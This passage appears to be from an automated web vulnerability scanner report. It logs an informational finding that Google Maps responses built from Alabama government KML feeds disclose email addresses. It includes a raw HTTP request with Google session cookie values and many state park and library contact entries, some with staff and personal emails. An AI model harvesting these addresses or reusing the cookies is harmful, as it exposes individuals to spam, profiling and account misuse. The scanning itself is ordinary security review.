me:"Buck`s Pocket - State Park",description:"\x3cb\x3eBuck's Pocket - State Park\x3c/b\x3e\x3cbr\x3e393 Co. Rd. 174\x3cbr\x3eGrove Oak, AL 35975\x3cbr\x3e256-659-2000\x3cbr\x3e256-659-2000 (fax)\x3cbr\x3ebuckspocketstpark@farmerstel.com",infoWindow:{title:"Buck`s Pocket - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Buck's Pocket - State Park393 Co. Rd. 174Grove Oak, AL 35975256-659-2000256-659-",dscr:"\x3cb\x3eBuck's Pocket - State Park\x3c/b\x3e\x3cbr\x3e393 Co. Rd. 174\x3cbr\x3eGrove Oak, AL 35975\x3cbr\x3e256-659-2000\x3cbr\x3e256-659-2000 (fax)\x3cbr\x3ebuckspocketstpark@farmerstel.com",dscr_dir:"ltr"},b_s:0,elms:[6,1,12,1,9,2,5]},{id:"K",fid:"g6e3afcd9687e4f39",latlng:{lat:34.450502,lng:-85.615296000000001},image:"http://www.alabama.gov/images/mapMarkers/PARKS_STATE_icon.png",ext:{
...[SNIP]...
",sxcn:"",name:"DeSoto - State Park",description:"\x3cb\x3eDeSoto - State Park\x3c/b\x3e\x3cbr\x3e13883 Co. Rd. 89\x3cbr\x3eFort Payne, AL 35967\x3cbr\x3e256-845-0051\x3cbr\x3e256-845-8286 (fax)\x3cbr\x3edesotostpk@mindspring.com",infoWindow:{title:"DeSoto - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"DeSoto - State Park13883 Co. Rd. 89Fort Payne, AL 35967256-845-0051256-845-8286 ",dscr:"\x3cb\x3eDeSoto - State Park\x3c/b\x3e\x3cbr\x3e13883 Co. Rd. 89\x3cbr\x3eFort Payne, AL 35967\x3cbr\x3e256-845-0051\x3cbr\x3e256-845-8286 (fax)\x3cbr\x3edesotostpk@mindspring.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.450502,-85.615296\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"L",fid:"g13289ea44f6f88be
...[SNIP]...
sxti:"Cheaha - State Park",sxcn:"",name:"Cheaha - State Park",description:"\x3cb\x3eCheaha - State Park\x3c/b\x3e\x3cbr\x3e19644 Hwy. 281\x3cbr\x3eDelta, AL 36258\x3cbr\x3e800-ALA-PARK\x3cbr\x3e\x3cbr\x3echeahastld@dcnr.alabama.gov",infoWindow:{title:"Cheaha - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cheaha - State Park19644 Hwy. 281Delta, AL 36258800-ALA-PARKcheahastld@dcnr.alab",dscr:"\x3cb\x3eCheaha - State Park\x3c/b\x3e\x3cbr\x3e19644 Hwy. 281\x3cbr\x3eDelta, AL 36258\x3cbr\x3e800-ALA-PARK\x3cbr\x3e\x3cbr\x3echeahastld@dcnr.alabama.gov",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.468332,-85.811698\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"M",fid:"geeedc2ea624811e1
...[SNIP]...
",name:"Paul M. Grist - State Park",description:"\x3cb\x3ePaul M. Grist - State Park\x3c/b\x3e\x3cbr\x3e1546 Grist Rd.\x3cbr\x3eSelma , AL 36701\x3cbr\x3e334-872-5846\x3cbr\x3e334-872-5846 (fax)\x3cbr\x3epgriststpk@mindspring.com",infoWindow:{title:"Paul M. Grist - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Paul M. Grist - State Park1546 Grist Rd.Selma , AL 36701334-872-5846334-872-5846",dscr:"\x3cb\x3ePaul M. Grist - State Park\x3c/b\x3e\x3cbr\x3e1546 Grist Rd.\x3cbr\x3eSelma , AL 36701\x3cbr\x3e334-872-5846\x3cbr\x3e334-872-5846 (fax)\x3cbr\x3epgriststpk@mindspring.com",dscr_dir:"ltr"},b_s:0,elms:[6,1,12,1,9,2,5]},{id:"N",fid:"g78ed2cd31f57d2e4",latlng:{lat:34.572291999999997,lng:-86.221485999999999},image:"http://www.alabama.gov/images/mapMarkers/PARKS_STATE_icon.p
...[SNIP]...
athedral Caverns - State Park",description:"\x3cb\x3eCathedral Caverns - State Park\x3c/b\x3e\x3cbr\x3e637 Cave Rd.\x3cbr\x3eWoodville, AL 35776\x3cbr\x3e256-728-8193\x3cbr\x3e256-728-8193 (fax)\x3cbr\x3eccaverns@nehp.net",infoWindow:{title:"Cathedral Caverns - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cathedral Caverns - State Park637 Cave Rd.Woodville, AL 35776256-728-8193256-728",dscr:"\x3cb\x3eCathedral Caverns - State Park\x3c/b\x3e\x3cbr\x3e637 Cave Rd.\x3cbr\x3eWoodville, AL 35776\x3cbr\x3e256-728-8193\x3cbr\x3e256-728-8193 (fax)\x3cbr\x3eccaverns@nehp.net",dscr_dir:"ltr"},b_s:0,elms:[6,1,12,1,9,2,5]},{id:"O",fid:"g2d983aac10f44d7a",latlng:{lat:32.551977000000001,lng:-85.475307000000001},image:"http://www.alabama.gov/images/mapMarkers/PARKS_STATE_icon.p
...[SNIP]...
:"",name:"Chewacla - State Park",description:"\x3cb\x3eChewacla - State Park\x3c/b\x3e\x3cbr\x3e124 Shell Toomer Pkwy.\x3cbr\x3eAuburn, AL 36830\x3cbr\x3e334-887-5621\x3cbr\x3e334-821-2439 (fax)\x3cbr\x3echewaclastpk@mindspring.com",infoWindow:{title:"Chewacla - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Chewacla - State Park124 Shell Toomer Pkwy.Auburn, AL 36830334-887-5621334-821-2",dscr:"\x3cb\x3eChewacla - State Park\x3c/b\x3e\x3cbr\x3e124 Shell Toomer Pkwy.\x3cbr\x3eAuburn, AL 36830\x3cbr\x3e334-887-5621\x3cbr\x3e334-821-2439 (fax)\x3cbr\x3echewaclastpk@mindspring.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.551977,-85.475307\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"P",fid:"gfcdb0dfedd4bfb43
...[SNIP]...
cn:"",name:"Lakepoint - State Park",description:"\x3cb\x3eLakepoint - State Park\x3c/b\x3e\x3cbr\x3e104 Lakepoint Dr.\x3cbr\x3eEufaula, AL 36027\x3cbr\x3e334-687-8011\x3cbr\x3e334-687-3273 (fax)\x3cbr\x3elakepointstld@mindspring.com",infoWindow:{title:"Lakepoint - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lakepoint - State Park104 Lakepoint Dr.Eufaula, AL 36027334-687-8011334-687-3273",dscr:"\x3cb\x3eLakepoint - State Park\x3c/b\x3e\x3cbr\x3e104 Lakepoint Dr.\x3cbr\x3eEufaula, AL 36027\x3cbr\x3e334-687-8011\x3cbr\x3e334-687-3273 (fax)\x3cbr\x3elakepointstld@mindspring.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.984792,-85.111524\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"Q",fid:"g87dbed4b328e6fe2
...[SNIP]...
name:"Frank Jackson - State Park",description:"\x3cb\x3eFrank Jackson - State Park\x3c/b\x3e\x3cbr\x3e100 Jerry Adams Dr.\x3cbr\x3eOpp, AL 36467\x3cbr\x3e334-493-6988\x3cbr\x3e334-493-2478 (fax)\x3cbr\x3efjackson@oppcatv.com",infoWindow:{title:"Frank Jackson - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Frank Jackson - State Park100 Jerry Adams Dr.Opp, AL 36467334-493-6988334-493-24",dscr:"\x3cb\x3eFrank Jackson - State Park\x3c/b\x3e\x3cbr\x3e100 Jerry Adams Dr.\x3cbr\x3eOpp, AL 36467\x3cbr\x3e334-493-6988\x3cbr\x3e334-493-2478 (fax)\x3cbr\x3efjackson@oppcatv.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.322728,-86.267470\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"R",fid:"g341441b5f198635f
...[SNIP]...
k",sxcn:"",name:"Florala - State Park",description:"\x3cb\x3eFlorala - State Park\x3c/b\x3e\x3cbr\x3e22738 Azalea Dr.\x3cbr\x3eFlorala, AL 36442\x3cbr\x3e334-858-6425\x3cbr\x3e334-858-2377 (fax)\x3cbr\x3efloralastpk@dcnr.alabama.gov",infoWindow:{title:"Florala - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Florala - State Park22738 Azalea Dr.Florala, AL 36442334-858-6425334-858-2377 (f",dscr:"\x3cb\x3eFlorala - State Park\x3c/b\x3e\x3cbr\x3e22738 Azalea Dr.\x3cbr\x3eFlorala, AL 36442\x3cbr\x3e334-858-6425\x3cbr\x3e334-858-2377 (fax)\x3cbr\x3efloralastpk@dcnr.alabama.gov",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=30.998138,-86.330395\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"S",fid:"g1b57d8ef0c184ea2
...[SNIP]...
od Caverns - State Park",description:"\x3cb\x3eRickwood Caverns - State Park\x3c/b\x3e\x3cbr\x3e370 Rickwood Park Rd.\x3cbr\x3eWarrior, AL 35180\x3cbr\x3e205-647-9692\x3cbr\x3e205-647-9692 (fax)\x3cbr\x3erickwoodstpk@mindspring.com",infoWindow:{title:"Rickwood Caverns - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Rickwood Caverns - State Park370 Rickwood Park Rd.Warrior, AL 35180205-647-96922",dscr:"\x3cb\x3eRickwood Caverns - State Park\x3c/b\x3e\x3cbr\x3e370 Rickwood Park Rd.\x3cbr\x3eWarrior, AL 35180\x3cbr\x3e205-647-9692\x3cbr\x3e205-647-9692 (fax)\x3cbr\x3erickwoodstpk@mindspring.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.876179,-86.857620\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"U",fid:"gd10c6bbfca4d5ab3
...[SNIP]...
on Springs - State Park",description:"\x3cb\x3eBlandon Springs - State Park\x3c/b\x3e\x3cbr\x3e3921 Bladon Rd.\x3cbr\x3eBladon Springs, AL 36919\x3cbr\x3e251-754-9207\x3cbr\x3e251-754-9207 (fax)\x3cbr\x3ebladonspringsstpk@millry.net",infoWindow:{title:"Blandon Springs - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Blandon Springs - State Park3921 Bladon Rd.Bladon Springs, AL 36919251-754-92072",dscr:"\x3cb\x3eBlandon Springs - State Park\x3c/b\x3e\x3cbr\x3e3921 Bladon Rd.\x3cbr\x3eBladon Springs, AL 36919\x3cbr\x3e251-754-9207\x3cbr\x3e251-754-9207 (fax)\x3cbr\x3ebladonspringsstpk@millry.net",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.737320,-88.196633\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"V",fid:"g8ffca5c1e07192c5
...[SNIP]...
Creek - State Park",description:"\x3cb\x3eWind Creek - State Park\x3c/b\x3e\x3cbr\x3e4325 Alabama Highway 128\x3cbr\x3eAlexander City, AL 35010\x3cbr\x3e256-329-0845\x3cbr\x3e256-234-4870 (fax)\x3cbr\x3ewindcreekstpk@mindspring.com",infoWindow:{title:"Wind Creek - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Wind Creek - State Park4325 Alabama Highway 128Alexander City, AL 35010256-329-0",dscr:"\x3cb\x3eWind Creek - State Park\x3c/b\x3e\x3cbr\x3e4325 Alabama Highway 128\x3cbr\x3eAlexander City, AL 35010\x3cbr\x3e256-329-0845\x3cbr\x3e256-234-4870 (fax)\x3cbr\x3ewindcreekstpk@mindspring.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.861295,-85.934232\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]},{id:"W",fid:"gc8e025300ca3336f
...[SNIP]...
sxcn:"",name:"Blue Springs - State Park",description:"\x3cb\x3eBlue Springs - State Park\x3c/b\x3e\x3cbr\x3e2595 Hwy. 10\x3cbr\x3eClio, AL 36017\x3cbr\x3e334-397-4875\x3cbr\x3e334-397-4875 (fax)\x3cbr\x3ebluespringsstpk@mindspring.com",infoWindow:{title:"Blue Springs - State Park",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Blue Springs - State Park2595 Hwy. 10Clio, AL 36017334-397-4875334-397-4875 (fax",dscr:"\x3cb\x3eBlue Springs - State Park\x3c/b\x3e\x3cbr\x3e2595 Hwy. 10\x3cbr\x3eClio, AL 36017\x3cbr\x3e334-397-4875\x3cbr\x3e334-397-4875 (fax)\x3cbr\x3ebluespringsstpk@mindspring.com",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.661591,-85.506999\x26thumb=0",photoType:2},b_s:0,elms:[6,10,1,12,1,9,2,5]}],layer_id:"kml:cj_I5Hzt5caUViv
...[SNIP]...

22.68. http://maps.google.com/maps/sf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/sf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /maps/sf?q=http%3A%2F%2Fwww.alabama.gov%2Frss%2Fmaps_LIBRARIES.kml&start=50&jsv=310c&vps=1&source=maps_api&callback=_xdc_._hgn3tnllp HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:47 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:47 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 73742

_xdc_._hgn3tnllp && _xdc_._hgn3tnllp({"name":"http://www.alabama.gov/rss/maps_LIBRARIES.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat: 0.
...[SNIP]...
lic Library",description:"\x3cb\x3eHoover Public Library\x3c/b\x3e\x3cbr\x3e200 Municipal Drive\x3cbr\x3eHoover, AL 35216-5510\x3cbr\x3e205-444-7810\x3cbr\x3e205-444-7878\x3cbr\x3e\x3ca href=\"mailto:lindaa@bham.lib.al.us\" target=\"_blank\"\x3elindaa@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.hoover.lib.al.us\" target=\"_blank\"\x3ehttp://www.hoover.lib.al.us\x3c/a\x3e",infoWindow:{title:"Hoover Public Library",basics:"\x3cdiv transclude=\"iw\"\x3
...[SNIP]...
205-444-7810205-44",dscr:"\x3cb\x3eHoover Public Library\x3c/b\x3e\x3cbr\x3e200 Municipal Drive\x3cbr\x3eHoover, AL 35216-5510\x3cbr\x3e205-444-7810\x3cbr\x3e205-444-7878\x3cbr\x3e\x3ca href=\"mailto:lindaa@bham.lib.al.us\" target=\"_blank\"\x3elindaa@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.hoover.lib.al.us\" target=\"_blank\"\x3ehttp://www.hoover.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x
...[SNIP]...
Library",description:"\x3cb\x3eHueytown Public Library\x3c/b\x3e\x3cbr\x3e1372 Hueytown Road\x3cbr\x3eHueytown, AL 35023-2443\x3cbr\x3e205-491-1443\x3cbr\x3e205-491-6319\x3cbr\x3e\x3ca href=\"mailto:cwright@bham.lib.al.us\" target=\"_blank\"\x3ecwright@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.hueytown.com/htnlib.htm\" target=\"_blank\"\x3ewww.hueytown.com/htnlib.htm\x3c/a\x3e",infoWindow:{title:"Hueytown Public Library",basics:"\x3cdiv transclude=\"iw\"\
...[SNIP]...
205-491-1443205",dscr:"\x3cb\x3eHueytown Public Library\x3c/b\x3e\x3cbr\x3e1372 Hueytown Road\x3cbr\x3eHueytown, AL 35023-2443\x3cbr\x3e205-491-1443\x3cbr\x3e205-491-6319\x3cbr\x3e\x3ca href=\"mailto:cwright@bham.lib.al.us\" target=\"_blank\"\x3ecwright@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.hueytown.com/htnlib.htm\" target=\"_blank\"\x3ewww.hueytown.com/htnlib.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x
...[SNIP]...
brary",description:"\x3cb\x3eIrondale Public Library\x3c/b\x3e\x3cbr\x3e105 South 20th Street\x3cbr\x3eIrondale, AL 35210-1593\x3cbr\x3e205-951-1415\x3cbr\x3e205-322-4924\x3cbr\x3e\x3ca href=\"mailto:dwilson@bham.lib.al.us\" target=\"_blank\"\x3edwilson@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.irondalelibrary.com\" target=\"_blank\"\x3ewww.irondalelibrary.com\x3c/a\x3e",infoWindow:{title:"Irondale Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/
...[SNIP]...
205-951-1415",dscr:"\x3cb\x3eIrondale Public Library\x3c/b\x3e\x3cbr\x3e105 South 20th Street\x3cbr\x3eIrondale, AL 35210-1593\x3cbr\x3e205-951-1415\x3cbr\x3e205-322-4924\x3cbr\x3e\x3ca href=\"mailto:dwilson@bham.lib.al.us\" target=\"_blank\"\x3edwilson@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.irondalelibrary.com\" target=\"_blank\"\x3ewww.irondalelibrary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x
...[SNIP]...
",description:"\x3cb\x3eJefferson Co Library Cooperative\x3c/b\x3e\x3cbr\x3e2100 Park Place\x3cbr\x3eBirmingham, AL 35203-2744\x3cbr\x3e205-226-3615\x3cbr\x3e205-226-3617\x3cbr\x3e\x3ca href=\"mailto:pryan@bham.lib.al.us\" target=\"_blank\"\x3epryan@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.jclc.org\" target=\"_blank\"\x3ewww.jclc.org\x3c/a\x3e",infoWindow:{title:"Jefferson Co Library Cooperative",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snip
...[SNIP]...
205-226",dscr:"\x3cb\x3eJefferson Co Library Cooperative\x3c/b\x3e\x3cbr\x3e2100 Park Place\x3cbr\x3eBirmingham, AL 35203-2744\x3cbr\x3e205-226-3615\x3cbr\x3e205-226-3617\x3cbr\x3e\x3ca href=\"mailto:pryan@bham.lib.al.us\" target=\"_blank\"\x3epryan@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.jclc.org\" target=\"_blank\"\x3ewww.jclc.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.520657,-86.807
...[SNIP]...
rary",description:"\x3cb\x3eLeeds Jane Culbreth Library\x3c/b\x3e\x3cbr\x3e8104 Parkway Drive SE\x3cbr\x3eLeeds, AL 35094-2217\x3cbr\x3e205-699-6843\x3cbr\x3e205-699-6843\x3cbr\x3e\x3ca href=\"mailto:djarvis@bham.lib.al.us\" target=\"_blank\"\x3edjarvis@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.leedslibrary.com\" target=\"_blank\"\x3ehttp://www.leedslibrary.com\x3c/a\x3e",infoWindow:{title:"Leeds Jane Culbreth Library",basics:"\x3cdiv transclude=\"i
...[SNIP]...
205-699-684",dscr:"\x3cb\x3eLeeds Jane Culbreth Library\x3c/b\x3e\x3cbr\x3e8104 Parkway Drive SE\x3cbr\x3eLeeds, AL 35094-2217\x3cbr\x3e205-699-6843\x3cbr\x3e205-699-6843\x3cbr\x3e\x3ca href=\"mailto:djarvis@bham.lib.al.us\" target=\"_blank\"\x3edjarvis@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.leedslibrary.com\" target=\"_blank\"\x3ehttp://www.leedslibrary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x
...[SNIP]...
c Library",description:"\x3cb\x3eMidfield Public Library\x3c/b\x3e\x3cbr\x3e400 Breland Drive\x3cbr\x3eMidfield, AL 35228-2732\x3cbr\x3e205-923-1027\x3cbr\x3e205-923-1027\x3cbr\x3e\x3ca href=\"mailto:sgarland@bham.lib.al.us\" target=\"_blank\"\x3esgarland@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.midfield.org\" target=\"_blank\"\x3ewww.midfield.org\x3c/a\x3e",infoWindow:{title:"Midfield Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snipp
...[SNIP]...
205-923-1027205-",dscr:"\x3cb\x3eMidfield Public Library\x3c/b\x3e\x3cbr\x3e400 Breland Drive\x3cbr\x3eMidfield, AL 35228-2732\x3cbr\x3e205-923-1027\x3cbr\x3e205-923-1027\x3cbr\x3e\x3ca href=\"mailto:sgarland@bham.lib.al.us\" target=\"_blank\"\x3esgarland@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.midfield.org\" target=\"_blank\"\x3ewww.midfield.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.457570
...[SNIP]...
Library",description:"\x3cb\x3ePleasant Grove Library\x3c/b\x3e\x3cbr\x3e501 Park Road\x3cbr\x3ePleasant Grove, AL 35127-0339\x3cbr\x3e205-744-1731\x3cbr\x3e205-744-5479\x3cbr\x3e\x3ca href=\"mailto:pleasantgrove@bham.lib.al.us\" target=\"_blank\"\x3epleasantgrove@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://pleasantgrove.lib.al.us\" target=\"_blank\"\x3ehttp://pleasantgrove.lib.al.us\x3c/a\x3e",infoWindow:{title:"Pleasant Grove Library",basics:"\x3cdiv transclude=\"
...[SNIP]...
205-744-1731205",dscr:"\x3cb\x3ePleasant Grove Library\x3c/b\x3e\x3cbr\x3e501 Park Road\x3cbr\x3ePleasant Grove, AL 35127-0339\x3cbr\x3e205-744-1731\x3cbr\x3e205-744-5479\x3cbr\x3e\x3ca href=\"mailto:pleasantgrove@bham.lib.al.us\" target=\"_blank\"\x3epleasantgrove@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://pleasantgrove.lib.al.us\" target=\"_blank\"\x3ehttp://pleasantgrove.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
c Library",description:"\x3cb\x3eTarrant Public Library\x3c/b\x3e\x3cbr\x3e1143 Ford Avenue\x3cbr\x3eBirmingham, AL 35217-2437\x3cbr\x3e205-841-0575\x3cbr\x3e205-326-5370\x3cbr\x3e\x3ca href=\"mailto:pjc6165@hotmail.com\" target=\"_blank\"\x3epjc6165@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://tarrant.lib.al.us\" target=\"_blank\"\x3ehttp://tarrant.lib.al.us\x3c/a\x3e",infoWindow:{title:"Tarrant Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c
...[SNIP]...
205-841-0575205-",dscr:"\x3cb\x3eTarrant Public Library\x3c/b\x3e\x3cbr\x3e1143 Ford Avenue\x3cbr\x3eBirmingham, AL 35217-2437\x3cbr\x3e205-841-0575\x3cbr\x3e205-326-5370\x3cbr\x3e\x3ca href=\"mailto:pjc6165@hotmail.com\" target=\"_blank\"\x3epjc6165@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://tarrant.lib.al.us\" target=\"_blank\"\x3ehttp://tarrant.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
brary",description:"\x3cb\x3eTrussville Public Library\x3c/b\x3e\x3cbr\x3e201 Parkway Drive\x3cbr\x3eTrussville, AL 35173-1125\x3cbr\x3e205-655-2022\x3cbr\x3e205-226-3786\x3cbr\x3e\x3ca href=\"mailto:bbrasher@bham.lib.al.us\" target=\"_blank\"\x3ebbrasher@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.trussvillelibrary.com\" target=\"_blank\"\x3ewww.trussvillelibrary.com\x3c/a\x3e",infoWindow:{title:"Trussville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3
...[SNIP]...
205-655-2022",dscr:"\x3cb\x3eTrussville Public Library\x3c/b\x3e\x3cbr\x3e201 Parkway Drive\x3cbr\x3eTrussville, AL 35173-1125\x3cbr\x3e205-655-2022\x3cbr\x3e205-226-3786\x3cbr\x3e\x3ca href=\"mailto:bbrasher@bham.lib.al.us\" target=\"_blank\"\x3ebbrasher@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.trussvillelibrary.com\" target=\"_blank\"\x3ewww.trussvillelibrary.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=
...[SNIP]...
"\x3cb\x3eVestavia Hills-Scrushy Pub Library\x3c/b\x3e\x3cbr\x3e1112 Montgomery Highway\x3cbr\x3eVestavia Hills, AL 35216-2797\x3cbr\x3e205-978-0155\x3cbr\x3e205-978-0155\x3cbr\x3e\x3ca href=\"mailto:jhammack@bham.lib.al.us\" target=\"_blank\"\x3ejhammack@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://vestavia.lib.al.us\" target=\"_blank\"\x3ehttp://vestavia.lib.al.us\x3c/a\x3e",infoWindow:{title:"Vestavia Hills-Scrushy Pub Library",basics:"\x3cdiv transclude=
...[SNIP]...
"\x3cb\x3eVestavia Hills-Scrushy Pub Library\x3c/b\x3e\x3cbr\x3e1112 Montgomery Highway\x3cbr\x3eVestavia Hills, AL 35216-2797\x3cbr\x3e205-978-0155\x3cbr\x3e205-978-0155\x3cbr\x3e\x3ca href=\"mailto:jhammack@bham.lib.al.us\" target=\"_blank\"\x3ejhammack@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://vestavia.lib.al.us\" target=\"_blank\"\x3ehttp://vestavia.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=
...[SNIP]...
",description:"\x3cb\x3eWalter J. Hanna Memorial Library\x3c/b\x3e\x3cbr\x3e4615 Gary Avenue\x3cbr\x3eFairfield, AL 35064-1341\x3cbr\x3e205-783-6007\x3cbr\x3e205-967-5376\x3cbr\x3e\x3ca href=\"mailto:lperry@bham.lib.al.us\" target=\"_blank\"\x3elperry@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://fairfield.lib.al.us\" target=\"_blank\"\x3ehttp://fairfield.lib.al.us\x3c/a\x3e",infoWindow:{title:"Walter J. Hanna Memorial Library",basics:"\x3cdiv transclude=
...[SNIP]...
205-783",dscr:"\x3cb\x3eWalter J. Hanna Memorial Library\x3c/b\x3e\x3cbr\x3e4615 Gary Avenue\x3cbr\x3eFairfield, AL 35064-1341\x3cbr\x3e205-783-6007\x3cbr\x3e205-967-5376\x3cbr\x3e\x3ca href=\"mailto:lperry@bham.lib.al.us\" target=\"_blank\"\x3elperry@bham.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://fairfield.lib.al.us\" target=\"_blank\"\x3ehttp://fairfield.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26
...[SNIP]...
